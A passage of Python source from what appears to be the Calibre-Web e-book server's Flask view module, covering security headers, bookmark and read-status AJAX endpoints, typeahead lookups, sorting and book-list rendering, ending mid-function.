# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as flask_session
from flask_babel import gettext as _
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import login_required_if_no_ano
from .render_template import render_title_template
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
feature_support['oauth'] = True
except ImportError:
feature_support['oauth'] = False
oauth_check = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as sort
except ImportError:
sort = sorted # Just use regular sort then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def add_security_headers(resp):
    """Attach standard security headers to every outgoing response."""
    csp = "default-src 'self' 'unsafe-inline' 'unsafe-eval';"
    if request.endpoint == "editbook.edit_book":
        # The book-edit page needs cover images from arbitrary origins.
        csp += "img-src * data:"
    headers = resp.headers
    headers['Content-Security-Policy'] = csp
    headers['X-Content-Type-Options'] = 'nosniff'
    headers['X-Frame-Options'] = 'SAMEORIGIN'
    headers['X-XSS-Protection'] = '1; mode=block'
    headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
    # log.debug(request.full_path)
    return resp
web = Blueprint('web', __name__)
log = logger.create()
# ################################### Login logic and rights management ###############################################
def download_required(f):
    """Decorator: only users holding the download role may call the view."""
    @wraps(f)
    def inner(*args, **kwargs):
        if not current_user.role_download():
            abort(403)
        return f(*args, **kwargs)

    return inner
def viewer_required(f):
    """Decorator: only users holding the viewer role may call the view."""
    @wraps(f)
    def inner(*args, **kwargs):
        if not current_user.role_viewer():
            abort(403)
        return f(*args, **kwargs)

    return inner
# ################################### data provider functions #########################################################
@web.route("/ajax/emailstat")
@login_required
def get_email_status_json():
    """Return the state of queued e-mail/conversion tasks as JSON."""
    return jsonify(render_task_status(WorkerThread.getInstance().tasks))
@web.route("/ajax/bookmark/<int:book_id>/<book_format>", methods=['POST'])
@login_required
def bookmark(book_id, book_format):
    """Store (or clear) the reading position for one book/format.

    The frontend posts the position in the ``bookmark`` form field.  An
    empty value deletes the stored bookmark (204 No Content); otherwise
    the old entry is replaced by the new one (201 Created).
    """
    bookmark_key = request.form["bookmark"]
    # Remove any existing bookmark for this user/book/format first.
    ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
                                              ub.Bookmark.book_id == book_id,
                                              ub.Bookmark.format == book_format)).delete()
    if not bookmark_key:
        ub.session_commit()
        return "", 204

    lbookmark = ub.Bookmark(user_id=current_user.id,
                            book_id=book_id,
                            format=book_format,
                            bookmark_key=bookmark_key)
    ub.session.merge(lbookmark)
    ub.session_commit("Bookmark for user {} in book {} created".format(current_user.id, book_id))
    return "", 201
@web.route("/ajax/toggleread/<int:book_id>", methods=['POST'])
@login_required
def toggle_read(book_id):
    """Toggle the read/unread flag of a book for the current user.

    Two storage models exist: by default the flag lives in Calibre-Web's
    own app database (``ub.ReadBook``); when ``config_read_column`` is
    set, the flag is a custom column inside the Calibre library instead.
    Returns an empty string on success or a message with HTTP 400.
    """
    if not config.config_read_column:
        # App-database model: flip the per-user ReadBook row.
        book = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(current_user.id),
                                                         ub.ReadBook.book_id == book_id)).first()
        if book:
            if book.read_status == ub.ReadBook.STATUS_FINISHED:
                book.read_status = ub.ReadBook.STATUS_UNREAD
            else:
                book.read_status = ub.ReadBook.STATUS_FINISHED
        else:
            # First toggle for this book: create the row as "finished".
            readBook = ub.ReadBook(user_id=current_user.id, book_id = book_id)
            readBook.read_status = ub.ReadBook.STATUS_FINISHED
            book = readBook
        if not book.kobo_reading_state:
            # Keep Kobo sync metadata in step with the read flag.
            kobo_reading_state = ub.KoboReadingState(user_id=current_user.id, book_id=book_id)
            kobo_reading_state.current_bookmark = ub.KoboBookmark()
            kobo_reading_state.statistics = ub.KoboStatistics()
            book.kobo_reading_state = kobo_reading_state
        ub.session.merge(book)
        ub.session_commit("Book {} readbit toggled".format(book_id))
    else:
        # Calibre-library model: the flag is a boolean custom column.
        try:
            calibre_db.update_title_sort(config)
            book = calibre_db.get_filtered_book(book_id)
            read_status = getattr(book, 'custom_column_' + str(config.config_read_column))
            if len(read_status):
                # Column value exists for this book: invert it.
                read_status[0].value = not read_status[0].value
                calibre_db.session.commit()
            else:
                # No value yet: create one set to "read".
                cc_class = db.cc_classes[config.config_read_column]
                new_cc = cc_class(value=1, book=book_id)
                calibre_db.session.add(new_cc)
                calibre_db.session.commit()
        except (KeyError, AttributeError):
            log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
            return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
        except (OperationalError, InvalidRequestError) as e:
            calibre_db.session.rollback()
            log.error(u"Read status could not set: %e", e)
            return "Read status could not set: {}".format(e), 400
    return ""
@web.route("/ajax/togglearchived/<int:book_id>", methods=['POST'])
@login_required
def toggle_archived(book_id):
    """Flip the archived flag of a book for the current user."""
    entry = ub.session.query(ub.ArchivedBook).filter(
        and_(ub.ArchivedBook.user_id == int(current_user.id),
             ub.ArchivedBook.book_id == book_id)).first()
    if entry:
        entry.is_archived = not entry.is_archived
        entry.last_modified = datetime.utcnow()
    else:
        # First time this book is archived for this user.
        entry = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
        entry.is_archived = True
    ub.session.merge(entry)
    ub.session_commit("Book {} archivebit toggled".format(book_id))
    return ""
@web.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def update_view():
    """Persist per-user view settings posted by the frontend as JSON."""
    to_save = request.get_json()
    try:
        for element, params in to_save.items():
            for param, value in params.items():
                current_user.set_view_property(element, param, value)
    except Exception as ex:
        # Malformed payloads land here; reject but keep the server alive.
        log.error("Could not save view_settings: %r %r: %e", request, to_save, ex)
        return "Invalid request", 400
    return "1", 200
'''
@web.route("/ajax/getcomic/<int:book_id>/<book_format>/<int:page>")
@login_required
def get_comic_book(book_id, book_format, page):
book = calibre_db.get_book(book_id)
if not book:
return "", 204
else:
for bookformat in book.data:
if bookformat.format.lower() == book_format.lower():
cbr_file = os.path.join(config.config_calibre_dir, book.path, bookformat.name) + "." + book_format
if book_format in ("cbr", "rar"):
if feature_support['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = sort(rf.namelist())
extract = lambda page: rf.read(names[page])
except:
# rarfile not valid
log.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
log.info('Unrar is not supported please install python rarfile extension')
# no support means return nothing
return "", 204
elif book_format in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=sort(zf.namelist())
extract = lambda page: zf.read(names[page])
elif book_format in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=sort(tf.getnames())
extract = lambda page: tf.extractfile(names[page]).read()
else:
log.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(page), 'base64').decode()
else:
b64 = extract(page).encode('base64')
ext = names[page].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[page], "page":page, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
# ################################### Typeahead ##################################################################
@web.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def get_authors_json():
    """Typeahead endpoint: author-name suggestions for search boxes."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Authors, search_term, ('|', ','))
@web.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def get_publishers_json():
    """Typeahead endpoint: publisher-name suggestions."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Publishers, search_term, ('|', ','))
@web.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def get_tags_json():
    """Typeahead endpoint: tag suggestions, restricted by the user's tag filter."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Tags, search_term, tag_filter=tags_filters())
@web.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def get_series_json():
    """Typeahead endpoint: series-name suggestions."""
    search_term = request.args.get('q')
    return calibre_db.get_typeahead(db.Series, search_term)
@web.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def get_languages_json():
    """Typeahead endpoint: language-name suggestions.

    Prefix matches come first; substring matches fill the list up to
    five entries.  Duplicates are removed while preserving that order,
    so the suggestion list is deterministic (the previous
    ``list(set(...))`` randomized it).
    """
    query = (request.args.get('q') or '').lower()
    language_names = isoLanguages.get_language_names(get_locale())
    # query is already lowercased above, so no second .lower() is needed.
    entries_start = [s for key, s in language_names.items() if s.lower().startswith(query)]
    if len(entries_start) < 5:
        entries = [s for key, s in language_names.items() if query in s.lower()]
        entries_start.extend(entries[0:(5 - len(entries_start))])
        # De-duplicate while keeping order (prefix matches stay first).
        seen = set()
        deduped = []
        for name in entries_start:
            if name not in seen:
                seen.add(name)
                deduped.append(name)
        entries_start = deduped
    json_dumps = json.dumps([dict(name=r) for r in entries_start[0:5]])
    return json_dumps
@web.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def get_matching_tags():
    """Return ids of all tags occurring in books matching the current
    advanced-search criteria (author, title, include/exclude tag lists).

    Used by the advanced-search form to narrow its tag pickers live.
    """
    tag_dict = {'tags': []}
    q = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
    # Register a Python lower() on the raw sqlite connection so the
    # ilike comparisons below are case-insensitive for non-ASCII too.
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    author_input = request.args.get('author_name') or ''
    title_input = request.args.get('book_title') or ''
    include_tag_inputs = request.args.getlist('include_tag') or ''
    exclude_tag_inputs = request.args.getlist('exclude_tag') or ''
    q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_input + "%")),
                 func.lower(db.Books.title).ilike("%" + title_input + "%"))
    if len(include_tag_inputs) > 0:
        for tag in include_tag_inputs:
            q = q.filter(db.Books.tags.any(db.Tags.id == tag))
    if len(exclude_tag_inputs) > 0:
        for tag in exclude_tag_inputs:
            q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
    # Collect the distinct tag ids of every remaining book.
    for book in q:
        for tag in book.tags:
            if tag.id not in tag_dict['tags']:
                tag_dict['tags'].append(tag.id)
    json_dumps = json.dumps(tag_dict)
    return json_dumps
def get_sort_function(sort, data):
    """Translate a sort keyword into a SQLAlchemy order_by list.

    ``'stored'`` restores the user's last choice for this view; any other
    value is persisted as the new stored choice.  Unknown keywords fall
    back to newest-first.
    """
    if sort == 'stored':
        sort = current_user.get_view_property(data, 'stored')
    else:
        current_user.set_view_property(data, 'stored', sort)

    order_builders = {
        'pubnew': lambda: [db.Books.pubdate.desc()],
        'pubold': lambda: [db.Books.pubdate],
        'abc': lambda: [db.Books.sort],
        'zyx': lambda: [db.Books.sort.desc()],
        'new': lambda: [db.Books.timestamp.desc()],
        'old': lambda: [db.Books.timestamp],
        'authaz': lambda: [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index],
        'authza': lambda: [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()],
        'seriesasc': lambda: [db.Books.series_index.asc()],
        'seriesdesc': lambda: [db.Books.series_index.desc()],
    }
    builder = order_builders.get(sort)
    if builder is None:
        # default: newest books first
        return [db.Books.timestamp.desc()]
    return builder()
def render_books_list(data, sort, book_id, page):
    """Dispatch a listing request to the matching render helper.

    ``data`` names the view (author, series, search, ...), ``sort`` the
    requested ordering keyword, ``book_id`` the id of the grouping
    entity where applicable, and ``page`` the 1-based page number.
    """
    order = get_sort_function(sort, data)
    if data == "rated":
        return render_rated_books(page, book_id, order=order)
    elif data == "discover":
        return render_discover_books(page, book_id)
    elif data == "unread":
        return render_read_books(page, False, order=order)
    elif data == "read":
        return render_read_books(page, True, order=order)
    elif data == "hot":
        return render_hot_books(page)
    elif data == "download":
        return render_downloaded_books(page, order, book_id)
    elif data == "author":
        return render_author_books(page, book_id, order)
    elif data == "publisher":
        return render_publisher_books(page, book_id, order)
    elif data == "series":
        return render_series_books(page, book_id, order)
    elif data == "ratings":
        return render_ratings_books(page, book_id, order)
    elif data == "formats":
        return render_formats_books(page, book_id, order)
    elif data == "category":
        return render_category_books(page, book_id, order)
    elif data == "language":
        return render_language_books(page, book_id, order)
    elif data == "archived":
        return render_archived_books(page, order)
    elif data == "search":
        term = (request.args.get('query') or '')
        offset = int(int(config.config_books_per_page) * (page - 1))
        return render_search_results(term, offset, order, config.config_books_per_page)
    elif data == "advsearch":
        # The advanced-search form handler stored its criteria in the
        # session as a JSON string.
        term = json.loads(flask_session['query'])
        offset = int(int(config.config_books_per_page) * (page - 1))
        return render_adv_search_results(term, offset, order, config.config_books_per_page)
    else:
        # Default view: all books, newest first (or the requested order).
        website = data or "newest"
        entries, random, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, order,
                                                                db.books_series_link,
                                                                db.Books.id == db.books_series_link.c.book,
                                                                db.Series)
        return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                     title=_(u"Books"), page=website)
def render_rated_books(page, book_id, order):
    """Page listing books rated above 9 (i.e. five stars)."""
    if not current_user.check_visibility(constants.SIDEBAR_BEST_RATED):
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.ratings.any(db.Ratings.rating > 9),
        order,
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries,
                                 pagination=pagination, id=book_id,
                                 title=_(u"Top Rated Books"), page="rated")
def render_discover_books(page, book_id):
    """Page showing a random selection of books ("Discover")."""
    if not current_user.check_visibility(constants.SIDEBAR_RANDOM):
        abort(404)
    entries, __, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, [func.randomblob(2)])
    # Deliberately overwrite the pagination: the random view is a single page.
    pagination = Pagination(1, config.config_books_per_page, config.config_books_per_page)
    return render_title_template('discover.html', entries=entries, pagination=pagination,
                                 id=book_id, title=_(u"Discover (Random Books)"), page="discover")
def render_hot_books(page):
    """Page listing the most-downloaded books.

    Popularity comes from the ub.Downloads table; download entries whose
    book no longer exists (or is filtered out for this user) are pruned
    on the fly while building the page.
    """
    if current_user.check_visibility(constants.SIDEBAR_HOT):
        if current_user.show_detail_random():
            random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            random = false()
        off = int(int(config.config_books_per_page) * (page - 1))
        # All downloads grouped per book, most-downloaded first.
        all_books = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
            func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
        hot_books = all_books.offset(off).limit(config.config_books_per_page)
        entries = list()
        for book in hot_books:
            # Re-check each book against the user's content filters.
            downloadBook = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
                db.Books.id == book.Downloads.book_id).first()
            if downloadBook:
                entries.append(downloadBook)
            else:
                # Download record points at a vanished book — clean it up.
                ub.delete_download(book.Downloads.book_id)
        numBooks = entries.__len__()
        pagination = Pagination(page, config.config_books_per_page, numBooks)
        return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                     title=_(u"Hot Books (Most Downloaded)"), page="hot")
    else:
        abort(404)
def render_downloaded_books(page, order, user_id):
    """Page listing the books a user has downloaded.

    Admins may inspect any user's downloads (``user_id`` from the URL);
    non-admins always see their own regardless of the argument.
    """
    if current_user.role_admin():
        user_id = int(user_id)
    else:
        user_id = current_user.id
    if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD):
        if current_user.show_detail_random():
            random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                .order_by(func.random()).limit(config.config_random_books)
        else:
            random = false()

        entries, __, pagination = calibre_db.fill_indexpage(page,
                                                            0,
                                                            db.Books,
                                                            ub.Downloads.user_id == user_id,
                                                            order,
                                                            ub.Downloads, db.Books.id == ub.Downloads.book_id)
        # Prune download records whose book is gone or filtered out.
        for book in entries:
            if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
                    .filter(db.Books.id == book.id).first():
                ub.delete_download(book.id)
        user = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
        return render_title_template('index.html',
                                     random=random,
                                     entries=entries,
                                     pagination=pagination,
                                     id=user_id,
                                     title=_(u"Downloaded books by %(user)s",user=user.name),
                                     page="download")
    else:
        abort(404)
def render_author_books(page, author_id, order):
    """Page listing all books of one author, optionally enriched with
    Goodreads author info and other-book suggestions."""
    entries, __, pagination = calibre_db.fill_indexpage(page, 0,
                                                        db.Books,
                                                        db.Books.authors.any(db.Authors.id == author_id),
                                                        [order[0], db.Series.name, db.Books.series_index],
                                                        db.books_series_link,
                                                        db.Books.id == db.books_series_link.c.book,
                                                        db.Series)
    if entries is None or not len(entries):
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
              category="error")
        return redirect(url_for("web.index"))
    # SQLAlchemy 2.x uses Session.get(); older versions use Query.get().
    if constants.sqlalchemy_version2:
        author = calibre_db.session.get(db.Authors, author_id)
    else:
        author = calibre_db.session.query(db.Authors).get(author_id)
    # Calibre stores author names with '|' as separator.
    author_name = author.name.replace('|', ',')
    author_info = None
    other_books = []
    if services.goodreads_support and config.config_use_goodreads:
        author_info = services.goodreads_support.get_author_info(author_name)
        other_books = services.goodreads_support.get_other_books(author_info, entries)
    return render_title_template('author.html', entries=entries, pagination=pagination, id=author_id,
                                 title=_(u"Author: %(name)s", name=author_name), author=author_info,
                                 other_books=other_books, page="author")
def render_publisher_books(page, book_id, order):
    """Render the paginated book list for one publisher; 404 for unknown ids."""
    publisher = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == book_id).first()
    if not publisher:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.publishers.any(db.Publishers.id == book_id),
        [db.Series.name, order[0], db.Books.series_index],
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
                                 title=_(u"Publisher: %(name)s", name=publisher.name), page="publisher")
def render_series_books(page, book_id, order):
    """Render the paginated book list for one series; 404 for unknown ids."""
    series = calibre_db.session.query(db.Series).filter(db.Series.id == book_id).first()
    if not series:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.series.any(db.Series.id == book_id),
        [order[0]])
    return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
                                 title=_(u"Series: %(serie)s", serie=series.name), page="series")
def render_ratings_books(page, book_id, order):
    """Render books carrying a given rating id; 404 for unknown/invalid ratings."""
    rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == book_id).first()
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.ratings.any(db.Ratings.id == book_id),
        [order[0]])
    # Calibre stores ratings doubled (0-10); the UI shows 0-5 stars.
    if rating and rating.rating <= 10:
        return render_title_template('index.html', random=random, pagination=pagination, entries=entries,
                                     id=book_id,
                                     title=_(u"Rating: %(rating)s stars", rating=int(rating.rating / 2)),
                                     page="ratings")
    abort(404)
def render_formats_books(page, book_id, order):
    """Render books available in a given file format; 404 for unknown formats."""
    fmt = calibre_db.session.query(db.Data).filter(db.Data.format == book_id.upper()).first()
    if not fmt:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.data.any(db.Data.format == book_id.upper()),
        [order[0]])
    return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
                                 title=_(u"File format: %(format)s", format=fmt.format), page="formats")
def render_category_books(page, book_id, order):
    """Render books tagged with the given category (tag) id; 404 for unknown tags."""
    category = calibre_db.session.query(db.Tags).filter(db.Tags.id == book_id).first()
    if not category:
        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(
        page, 0,
        db.Books,
        db.Books.tags.any(db.Tags.id == book_id),
        [order[0], db.Series.name, db.Books.series_index],
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
                                 title=_(u"Category: %(name)s", name=category.name), page="category")
def render_language_books(page, name, order):
    """Render the paginated book list for one ISO language code; 404 if unknown."""
    try:
        lang_name = isoLanguages.get_language_name(get_locale(), name)
    except KeyError:
        abort(404)
    #try:
    #    cur_l = LC.parse(name)
    #    lang_name = cur_l.get_language_name(get_locale())
    #except UnknownLocaleError:
    #    try:
    #        lang_name = _(isoLanguages.get(part3=name).name)
    #    except KeyError:
    #        abort(404)
    entries, random, pagination = calibre_db.fill_indexpage(page, 0,
                                                            db.Books,
                                                            db.Books.languages.any(db.Languages.lang_code == name),
                                                            [order[0]])
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=name,
                                 title=_(u"Language: %(name)s", name=lang_name), page="language")
def render_read_books(page, are_read, as_xml=False, order=None):
    """Render the read or unread book list (HTML page, or raw data for OPDS).

    Read state comes from Calibre-Web's own ReadBook table, or — when
    ``config_read_column`` is set — from a boolean custom column in Calibre.
    """
    order = order or []
    if not config.config_read_column:
        # Internal read tracking: per-user rows in ub.ReadBook.
        if are_read:
            db_filter = and_(ub.ReadBook.user_id == int(current_user.id),
                             ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
        else:
            # coalesce() treats books with no ReadBook row as unread.
            db_filter = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
        entries, random, pagination = calibre_db.fill_indexpage(page, 0,
                                                                db.Books,
                                                                db_filter,
                                                                order,
                                                                db.books_series_link,
                                                                db.Books.id == db.books_series_link.c.book,
                                                                db.Series,
                                                                ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
    else:
        # Read state maintained in a Calibre boolean custom column.
        try:
            if are_read:
                db_filter = db.cc_classes[config.config_read_column].value == True
            else:
                db_filter = coalesce(db.cc_classes[config.config_read_column].value, False) != True
            entries, random, pagination = calibre_db.fill_indexpage(page, 0,
                                                                    db.Books,
                                                                    db_filter,
                                                                    order,
                                                                    db.books_series_link,
                                                                    db.Books.id == db.books_series_link.c.book,
                                                                    db.Series,
                                                                    db.cc_classes[config.config_read_column])
        except (KeyError, AttributeError):
            # Configured custom column is missing from the Calibre database.
            log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
            if not as_xml:
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return redirect(url_for("web.index"))
            # ToDo: Handle error Case for opds
            # NOTE(review): when as_xml is True and this except branch was
            # taken, 'entries'/'pagination' below are unbound — see ToDo.
    if as_xml:
        return entries, pagination
    else:
        if are_read:
            name = _(u'Read Books') + ' (' + str(pagination.total_count) + ')'
            pagename = "read"
        else:
            name = _(u'Unread Books') + ' (' + str(pagination.total_count) + ')'
            pagename = "unread"
        return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                     title=name, page=pagename)
def render_archived_books(page, order):
    """Render the current user's archived books as a paginated index view."""
    order = order or []
    # Collect the book ids this user archived (is_archived == True is the
    # SQLAlchemy column comparison, not an identity check).
    archived_ids = [
        row.book_id
        for row in ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.user_id == int(current_user.id))
        .filter(ub.ArchivedBook.is_archived == True)
        .all()
    ]
    entries, random, pagination = calibre_db.fill_indexpage_with_archived_books(
        page, 0,
        db.Books,
        db.Books.id.in_(archived_ids),
        order,
        allow_show_archived=True)
    title = _(u'Archived Books') + ' (' + str(len(archived_ids)) + ')'
    return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
                                 title=title, page="archived")
def render_prepare_search_form(cc):
    """Render the advanced-search form, populated with the selectable values.

    *cc* is the list of custom columns to offer as extra search fields.
    """
    # prepare data for search-form
    tags = calibre_db.session.query(db.Tags)\
        .join(db.books_tags_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_tags_link.tag'))\
        .order_by(db.Tags.name).all()
    series = calibre_db.session.query(db.Series)\
        .join(db.books_series_link)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(text('books_series_link.series'))\
        .order_by(db.Series.name)\
        .filter(calibre_db.common_filters()).all()
    # Offer the user's own shelves plus all public ones.
    shelves = ub.session.query(ub.Shelf)\
        .filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(current_user.id)))\
        .order_by(ub.Shelf.name).all()
    extensions = calibre_db.session.query(db.Data)\
        .join(db.Books)\
        .filter(calibre_db.common_filters()) \
        .group_by(db.Data.format)\
        .order_by(db.Data.format).all()
    # Only offer a language selector when the user is not locked to one language.
    if current_user.filter_language() == u"all":
        languages = calibre_db.speaking_language()
    else:
        languages = None
    return render_title_template('search_form.html', tags=tags, languages=languages, extensions=extensions,
                                 series=series,shelves=shelves, title=_(u"Advanced Search"), cc=cc, page="advsearch")
def render_search_results(term, offset=None, order=None, limit=None):
    """Run a simple full-text search and render the results page."""
    entries, result_count, pagination = calibre_db.get_search_results(
        term,
        offset,
        order,
        limit,
        db.books_series_link,
        db.Books.id == db.books_series_link.c.book,
        db.Series)
    return render_title_template('search.html',
                                 searchterm=term,
                                 pagination=pagination,
                                 query=term,
                                 adv_searchterm=term,
                                 entries=entries,
                                 result_count=result_count,
                                 title=_(u"Search"),
                                 page="search")
# ################################### View Books list ##################################################################
@web.route("/", defaults={'page': 1})
@web.route('/page/<int:page>')
@login_required_if_no_ano
def index(page):
    """Landing page: newest books, honoring the requested sort (default 'stored')."""
    requested_sort = (request.args.get('sort') or 'stored').lower()
    return render_books_list("newest", requested_sort, 1, page)
@web.route('/<data>/<sort_param>', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/<book_id>', defaults={'page': 1})
@web.route('/<data>/<sort_param>/<book_id>/<int:page>')
@login_required_if_no_ano
def books_list(data, sort_param, book_id, page):
    """Generic paginated book list; *data* selects the view (author, series, ...)."""
    return render_books_list(data, sort_param, book_id, page)
@web.route("/table")
@login_required
def books_table():
    """Render the editable books table with the user's stored column visibility."""
    visibility = current_user.view_settings.get('table', {})
    # NOTE(review): the keyword 'visiblility' is misspelled but the template
    # presumably reads the same name — do not rename it here in isolation.
    return render_title_template('book_table.html', title=_(u"Books List"), page="book_table",
                                 visiblility=visibility)
@web.route("/ajax/listbooks")
@login_required
def list_books():
    """JSON backend for the books table (bootstrap-table ajax endpoint).

    Supports paging (offset/limit), free-text search, column sorting and
    restoring a checkbox selection ('state'); returns the rows plus the
    filtered and unfiltered counts.
    """
    off = int(request.args.get("offset") or 0)
    limit = int(request.args.get("limit") or config.config_books_per_page)
    search = request.args.get("search")
    sort = request.args.get("sort", "id")
    order = request.args.get("order", "").lower()
    state = None
    join = tuple()
    # Translate the requested sort column into an ORDER BY clause plus the
    # join(s) needed to reach the linked table.
    if sort == "state":
        state = json.loads(request.args.get("state", "[]"))
    elif sort == "tags":
        order = [db.Tags.name.asc()] if order == "asc" else [db.Tags.name.desc()]
        join = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
    elif sort == "series":
        order = [db.Series.name.asc()] if order == "asc" else [db.Series.name.desc()]
        join = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
    elif sort == "publishers":
        order = [db.Publishers.name.asc()] if order == "asc" else [db.Publishers.name.desc()]
        join = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
    elif sort == "authors":
        order = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if order == "asc" \
            else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
        join = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
               db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
    elif sort == "languages":
        order = [db.Languages.lang_code.asc()] if order == "asc" else [db.Languages.lang_code.desc()]
        join = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
    elif order and sort in ["sort", "title", "authors_sort", "series_index"]:
        # Plain Books columns: sort directly by column name.
